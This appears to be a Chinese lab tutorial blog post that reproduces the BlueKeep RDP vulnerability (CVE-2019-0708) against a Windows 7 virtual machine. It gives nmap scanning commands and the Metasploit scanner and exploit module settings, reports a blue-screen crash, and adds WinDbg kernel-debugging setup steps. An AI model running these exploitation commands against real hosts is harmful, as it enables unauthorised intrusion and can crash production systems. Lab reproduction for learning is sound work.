域渗透03-漏洞(CVE-2019-0708)

漏洞简介:

        CVE-2019-0708只能针对以下版本系统,win7以后的系统不存在漏洞:

        Windows Server 2008 R2 、 Windows Server 2008 、Windows 2003 、 Windows XP。

        漏洞是通过RDP协议攻击,这就需要我们攻击的主机开放了远程桌面,一般就是3389端口,属于UAF堆溢出漏洞,漏洞存在与termdd.sys中,因为攻击的是内核,所以在攻击的时候如果配置选择错误,很容易导致蓝屏,所以在实战中一定要慎重操作。

漏洞复现:

靶机环境:

        win7:192.168.1.10

        vmware:17

        kali:192.168.1.5

首先使用在kali下使用nmap扫描win7靶机,首先扫描开放的端口,如果协议没扫出来,可以在根据结果进行协议全扫描,可以更好的识别端口对应的协议,另外加-O识别系统

nmap -p- --min-rate 2000 -sT 192.168.1.10
nmap -p 3389 --version-all -O 192.168.1.10

可以看到3389 协议rdp(ms-wbt-server),可以进行测试。由于在虚拟机,nmap识别的不是很准。

 测试漏洞是否存在:

        在找到靶机,且对外开放3389端口后,我们首先要测试漏洞是否存在,再考虑是否进行下一步的攻击:

msfconsole
reload_all
search 0708

 可以看到有两个,第一个poc,第二个是exp。

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  
set rhosts 192.168.1.10
show options

 可以看到存在漏洞

利用:

        下面利用msf中之前搜索出来的exp尝试进行攻击

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.10
set target 1
set forceexploit true
show options

        其中 使用show target 可以查看攻击的平台,当攻击发现蓝屏的时候,可以通过这里进行查看找到和自己攻击系统相同的主机

        ​​​可以查看到配置信息

        执行漏洞 

        执行后发现蓝屏了,没有返回shell,很尴尬了,这一定是漏洞的地址有问题,调试下看看:

         

总结:

        这个漏洞因为是针对内核的攻击,不同系统版本的地址会有所不同,所以在利用的时候很容易造成蓝屏,在真实的渗透测试中这个还是很危险的,毕竟蓝屏了影响还是有点大的,所以这个可以用来作为研究,要是真的想进行攻击尝试,最好对应好系统版本在做尝试。

题外话调试测试:

 安装windbg:

首先安装windbag,下载地址:

x64
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools_amd64/dbg_amd64.msi
x86
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools/dbg_x86.msi

安装并添加双机调试:

  1. 选择【编辑虚拟机设置】,移除【打印机】
  2. 添加【串行端口】,在配置中选择【使用命名的管道】,输入\\.\pipe\com_1,第一个选择【该端是服务器】,另一个选择【另一端是应用程序】。勾选【轮询时主动放弃CPU】,点击【确定】
  3. 开启Windows 7,以管理员身份运行命令行,输入bcdedit /dbgsettings serial baudrate:115200 debugport:1 来设置端口com_1, baudrate为115200。
  4. 输入bcdedit /displayorder {current} {e8a0ccf0-9748-11eb-950a-ce6045b926ac} 在引导菜单中增加一个新的选项。 (注意:这里的{e8a0ccf0-9748-11eb-950a-ce6045b926ac}要输入你自己上一步生成的ID号)
  5. 输入bcdedit /debug {e8a0ccf0-9748-11eb-950a-ce6045b926ac} ON 来激活debug。 (这里的ID和上面的一样)
  6. 将WinDbg发送到桌面快捷方式,右击桌面上的快捷方式,点击【属性】,在目标中追加-b -k com:pipe,port=\\.\pipe\com_1,resets=0 (注意:如果之前的内容有双引号,要把追加内容放在双引号之后)
  7. 设置一个名为_NT_SYMBOL_PATH的系统变量,变量值设为srv*d:\ctftools\symbols*http://msdl.microsoft.com/download/symbols ,其中*d:\ctftools\symbols*是缓存符号表的位置,可以自己更改。
  8. 重新启动Windows 7 OS,开机时选择【DebugEntry】,同时打开WinDbg。

 调试:

        

猜你喜欢

转载自blog.csdn.net/GalaxySpaceX/article/details/130449689